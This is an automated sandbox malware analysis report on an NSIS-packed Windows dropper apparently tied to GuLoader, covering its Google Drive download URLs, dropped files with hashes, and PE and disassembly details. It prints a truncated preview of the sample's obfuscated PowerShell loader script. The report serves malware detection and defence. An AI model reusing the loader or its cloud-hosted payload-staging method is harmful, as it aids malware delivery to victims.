                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://drive.usercontent.google.com/msiexec.exe, 00000007.00000003.2168449456.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1985745862.00000000088CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2547048092.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2237096223.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2341152957.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1973777861.00000000088CF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2214193524.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2260331714.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2133964562.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2352723110.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2066608581.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293897107.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2146169689.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2100971085.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2422378070.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2455642871.0000000008908000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2467698218.0000000008908000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://nsis.sf.net/NSIS_ErrorErroryMXFgPOdf2.exe, 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmp, yMXFgPOdf2.exe, 00000000.00000000.1352234700.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                    high
                                    https://drive.google.com/aS%msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.mipowershell.exe, 00000002.00000002.1833058166.000000000772D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.commsiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com77msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://drive.google.com/msiexec.exe, 00000007.00000003.2168449456.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2547048092.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2237096223.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2341152957.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2214193524.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2260331714.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2133964562.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2352723110.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2066608581.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293897107.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2146169689.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2100971085.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2422378070.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2400033827.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2433075862.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2444573507.00000000088CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/TNmsiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2009877653.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2020881269.00000000088C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.usercontent.google.com/;msiexec.exe, 00000007.00000003.2317159024.00000000088C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://apis.google.commsiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.microsoft.cpowershell.exe, 00000002.00000002.1836180120.0000000008899000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1828484729.00000000050F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/qS5msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                142.250.185.161
                                                                drive.usercontent.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.184.238
                                                                drive.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1588705
                                                                Start date and time:2025-01-11 04:24:58 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 59s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:11
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:yMXFgPOdf2.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7.exe
                                                                Detection:MAL
                                                                Classification:mal96.troj.evad.winEXE@6/12@2/2
                                                                EGA Information:
                                                                • Successful, ratio: 33.3%
                                                                HCA Information:
                                                                • Successful, ratio: 93%
                                                                • Number of executed functions: 87
                                                                • Number of non-executed functions: 52
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 6332 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                TimeTypeDescription
                                                                22:26:00API Interceptor39x Sleep call for process: powershell.exe modified
                                                                22:27:01API Interceptor28x Sleep call for process: msiexec.exe modified
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                s-part-0017.t-0009.t-msedge.net1dVtYIvfHz.exeGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.45
                                                                FJRUb5lb9m.exeGet hashmaliciousFormBookBrowse
                                                                • 13.107.246.45
                                                                5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 13.107.246.45
                                                                02Eh1ah35H.exeGet hashmaliciousGuLoaderBrowse
                                                                • 13.107.246.45
                                                                AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.45
                                                                suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                • 13.107.246.45
                                                                1297823757234143258.jsGet hashmaliciousStrela DownloaderBrowse
                                                                • 13.107.246.45
                                                                4N4nldx1wW.exeGet hashmaliciousFormBookBrowse
                                                                • 13.107.246.45
                                                                1487427797195518826.jsGet hashmaliciousStrela DownloaderBrowse
                                                                • 13.107.246.45
                                                                5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                • 13.107.246.45
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                37f463bf4616ecd445d4a1937da06e1902Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                LMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.185.161
                                                                • 142.250.184.238
                                                                No context
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):53158
                                                                Entropy (8bit):5.062687652912555
                                                                Encrypted:false
                                                                SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                MD5:5D430F1344CE89737902AEC47C61C930
                                                                SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):348907
                                                                Entropy (8bit):7.64923648165635
                                                                Encrypted:false
                                                                SSDEEP:6144:JhtZdbciFRH/0Mx7fRlSiK32RoFqpOXNBhknlKcwoMFW0wN:NjxF5xrRlFK32R0zm5woMFWH
                                                                MD5:000C4C2148C711E5D3CBEED4144C6F55
                                                                SHA1:E35927390A543BEE257AE0009701C57FF6704E55
                                                                SHA-256:8E75A4461FDBC1386345F6F9CCD0984FBB1799B92033F902B2F43EB6421B9E7E
                                                                SHA-512:613BB7929D5BEDF7A12C41553AD87B955C5EC6862E15DB03E776DC55B396A7D25CDA6E5F40319DE8896D108D1521AD4CC1D070ADEA91F2E4DFFE79ECBB5E654B
                                                                Malicious:false
                                                                Preview:...................|.....555..##.c.-.........e.............]].:::::::...mmm..................................^^.................HHHH.......FFFF.III....ff.........................TT....UU..nn..ssssss.............00000..a........I...--..'.??....~........m...RRR.!!..44.......*.00................((.6.............j..............-..............##.4.9.MM..........}}}.........=.............D............................::..mmmm.....jj.......a.............mm.........y.....................................................z......ee.9999999999.......................???...........I......./....................RRRR..z.....................................".((.........................@..................s..qqqqqq.;..@..............oooooo.tt....S.GGGG..a......c...............NN..l...........w.MM...YY.....................D..fffffff.\.....................88.....aa...PPP.......q.....Y.g...........................2.....>>........ee............[[[. .1...```...............T.................+++..GG............c.
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):389321
                                                                Entropy (8bit):1.2441456788113954
                                                                Encrypted:false
                                                                SSDEEP:1536:FeL5BK5C2PeeejgqyaJ5vizEyLZ/5DKMdt/v:ALXYcjBjJRioyLZ/vP
                                                                MD5:89E3C9CE687BCCD3DD422E9CF78E80E7
                                                                SHA1:007C57BDF5F5E6C0E5B711EBC7BABD673405868D
                                                                SHA-256:51F91F8B04620D371417A6A74162ABD8B690909C544F320338B874F3DDAC4BC2
                                                                SHA-512:2245F6FF3D25FF4142C8C2FB716C775F16592E33909EF9CBD61D2B4AB9891224D45AA58DE3861606DE97604BDD91C78F05BFEFA9A5E80F3272AEBEA6023B804D
                                                                Malicious:false
                                                                Preview:....O................................................<...7.K.......................\...........................................$............M......................................................................................................~...................q................................................................................w..............r...........................a...........................%......................l.......................................4.........+.............................................._.............................................................@..................................................................................#.....................Q....................M....................X....e..................lC.........,..............................a........C....1..............................[...................q...............................B.............................,.........U...................................................
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):353789
                                                                Entropy (8bit):1.2644758643056393
                                                                Encrypted:false
                                                                SSDEEP:768:13gkCATl4BkZKo0fUjjxFBEdCYm58mNplGQUxbgNcDr7A78Q0Ej8RTTzVs2zWjtq:d0AHnNm/pdYlHvnAYv
                                                                MD5:1389593C3437BAED25D4CD0C926898FF
                                                                SHA1:532BC681AF49B0BEAD471EBBA0AB0191E78A4E02
                                                                SHA-256:9A8D9ED596327751DB6960002DD258066E82BE64080C737D381708446BEB519E
                                                                SHA-512:C6DB96BAEA286B7281B1E068B78D5076F4EAE2DBEB01CAA43C59C29F1839F2328FB59ACE190EA8267790D726706E0F0234876F6ED665818EA0D1AE252DB18C57
                                                                Malicious:false
                                                                Preview:...............6........................R.N.......................................................^.......................................w.......................R..................................k.......................~.................U...................... s..................4........V............................<............h...........U...............................-...................................................e.................@.......-................................................[...............=...........................................N.....w..^.5.............+.............................................................................*...........................c...........................b.......................f............>....................+...................0_........................................@........^........._.........W........u............................................b...$...........}.........................9.~...........L.................
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Category:dropped
                                                                Size (bytes):554816
                                                                Entropy (8bit):7.967733280499974
                                                                Encrypted:false
                                                                SSDEEP:12288:aICfPgs7diA6gdZiygrNIVYAHHjMIyoS/B3FYA1YU:MZdL6AMxI+Aopz/lJv
                                                                MD5:54327A2F6C75BB2C549A5A98A462A588
                                                                SHA1:F65473FA075BEF32B55445D84CB8BFA4DA48AC79
                                                                SHA-256:C3463021D3069AE7AAD460707A950EB7B427A65C87F3D8E201B59CEBB886A1B7
                                                                SHA-512:88595FA0AF8AC0211145787CE0D0D3AFDFB396EDFCFCBAB16D4714FBFB1077A8EB8DF5EC6BD9AAEFD916611363DD7791C62CFABA24A571BD4279FFB93BB73866
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................b..........)2............@..................................................................................... ............................................................................................................text...l`.......b.................. ..`.rdata..`............f..............@..@.data................|..............@....ndata.......P...........................rsrc... ...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (4175), with CRLF, LF line terminators
                                                                Category:dropped
                                                                Size (bytes):72419
                                                                Entropy (8bit):5.202406314479258
                                                                Encrypted:false
                                                                SSDEEP:1536:5IvdS5j9pnCoq0dne+ScDJCnHEQNH48jf3Wv+DTUPStt+LLAfD:GvwDpnf1J4nHtYuf86PN7
                                                                MD5:5F7683B5FC367FB972FDAF8E80B65209
                                                                SHA1:A13FF69F57AF2E5AB471F513C8188437D6D2EE6C
                                                                SHA-256:4DD50C49D0122FC5E02AC8806E6F6ABACFA8A5F9E868355824665DD76FAD2959
                                                                SHA-512:D7B54E3E42C8EC494C6FDB69A4C7FB4D1C2A86229F5BDE05EF17A97BA5134AD5A063080E9638FF2C44FB730A2C8ED42A34268F5C8C61C86E15E87D272C03C621
                                                                Malicious:false
                                                                Preview:$Radikandernes=$Signifikansniveauerneslindtarmsoperationer;.....<#Irradiates Inoculum Cacodaemon Endosperm Etiopisk Hoejreparenteser #>..<#saccharometres Abusious Dragers Ufredeligheds Gyngende Historial #>..<#Pseudoparallel Musicerendes Radikalisere Zygodont Smedesvenden #>..<#Svedkirtels Spinomuscular fuga Bygningattester Sculptitory Phthiriasis Nstmest #>..<#Uroliths Rkerivalen Epileptically Textilist transferrins #>..<#Wooziness cupeller Undoings Opretningernes Fordomsfries monsuners #>...$Fyrrekoglerne = @'.Uri ome. Normsy$AsherytRGravernt Fstemne Panuelbskdefral sebaroAccrescmJ.wliessTilsendtanom,idr Pindsve issekrtSknkeprsHematin=Superpl$TwirlieJ.seudoptP intert S,ilemeDaduchusAarsungtTresindu ekanise UndularEnkemannAfst esesekretisFemkmp ;wightaf.Embr onfSucceeduLucratin BaglygcUr nstitramseybiSor.imeoK mmerhnPuff.et OverfesA Hovedbs FunktikStraahaa fran,urSliwe ciAcumblesFlorsuk Phrasab(Indiane$BlendenFB vislirSapiostdIndsigtsNyisma.eBotan zlLocutorsBoulevalRacallaoSuccussv
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):123589
                                                                Entropy (8bit):1.2483073164392806
                                                                Encrypted:false
                                                                SSDEEP:768:m1KHXfm5rQX+j8EqstsDz8z/nFdKur6NmZSqC+uioeefzpB:6KuTUst73XQTdFB
                                                                MD5:C8E4A04215D6E7A2A46B2ECF556E8034
                                                                SHA1:EC0CF162AFCCFC3EE67BEEF117DB801EAE87095A
                                                                SHA-256:AB50D30AFE30A2B1E868A29CA803681B1A5C0182A1BA8A68E1F7F41C241CFAC2
                                                                SHA-512:8FA144195FEDEB75D2E874AE4A35E667E366F805BE91D0AF79309FAEEA2857668FBFC4EC31F2CE85FF40BC197802F0E2EBEAF8C07AF12D4782A5B8A09792558E
                                                                Malicious:false
                                                                Preview:.....".............................................................................................................0...........2...............'..[.......[..............B....................'......'.q............2...............".............h..................&.................J...........................$@.....................W............................................h...........................................!...........k...................2..............%..............................................U....................(......................................................N.......................................=.........................}...................................W......T......................|....................................................................................-..................................................................#....................................................................<...............'.................~........n........P...
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.967733280499974
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:yMXFgPOdf2.exe
                                                                File size:554'816 bytes
                                                                MD5:54327a2f6c75bb2c549a5a98a462a588
                                                                SHA1:f65473fa075bef32b55445d84cb8bfa4da48ac79
                                                                SHA256:c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7
                                                                SHA512:88595fa0af8ac0211145787ce0d0d3afdfb396edfcfcbab16d4714fbfb1077a8eb8df5ec6bd9aaefd916611363dd7791c62cfaba24a571bd4279ffb93bb73866
                                                                SSDEEP:12288:aICfPgs7diA6gdZiygrNIVYAHHjMIyoS/B3FYA1YU:MZdL6AMxI+Aopz/lJv
                                                                TLSH:A3C4231241A3D227D6B20B32257375438A55D13CB42A674A0BD4A52FFF1FB877A2B317
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................b..........)2............@
                                                                Icon Hash:3d2e0f95332b3399
                                                                Entrypoint:0x403229
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x52BA66B8 [Wed Dec 25 05:01:44 2013 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:7ed0d71376e55d58ab36dc7d3ffda898
                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                xor ebp, ebp
                                                                pop esi
                                                                mov dword ptr [esp+14h], ebp
                                                                mov dword ptr [esp+10h], 0040A2D8h
                                                                mov dword ptr [esp+1Ch], ebp
                                                                call dword ptr [00408034h]
                                                                push 00008001h
                                                                call dword ptr [00408134h]
                                                                push ebp
                                                                call dword ptr [004082ACh]
                                                                push 00000008h
                                                                mov dword ptr [00434F58h], eax
